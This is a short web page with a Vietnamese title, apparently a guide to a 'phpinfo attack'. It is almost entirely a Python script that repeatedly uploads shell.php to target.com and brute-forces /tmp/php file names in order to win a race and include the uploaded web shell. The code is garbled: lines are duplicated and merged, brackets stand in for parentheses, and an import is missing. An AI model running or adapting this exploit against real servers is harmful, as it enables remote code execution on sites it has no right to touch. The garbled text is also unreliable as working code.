Hướng dẫn phpinfo attack - cuộc tấn công phpinfo

import itertools itertools

import requests requests

import sys sys

print['[+] Trying to win the race']['[+] Trying to win the race']

f ={'file':open['shell.php','rb']}={'file': open['shell.php','rb']}

for _ inrange[4096*4096]: _ inrange[4096*4096]:

requests.post['//target.com/index.php?c=index.php', f].post['//target.com/index.php?c=index.php', f]

print['[+] Trying to win the race']['[+] Bruteforcing the inclusion']

f ={'file':open['shell.php','rb']} fname in itertools.combinations[string.ascii_letters + string.digits,6]:

for _ inrange[4096*4096]:='//target.com/index.php?c=/tmp/php'+ fname

requests.post['//target.com/index.php?c=index.php', f]= requests.get[url]

print['[+] Bruteforcing the inclusion']'load average'in r.text:#

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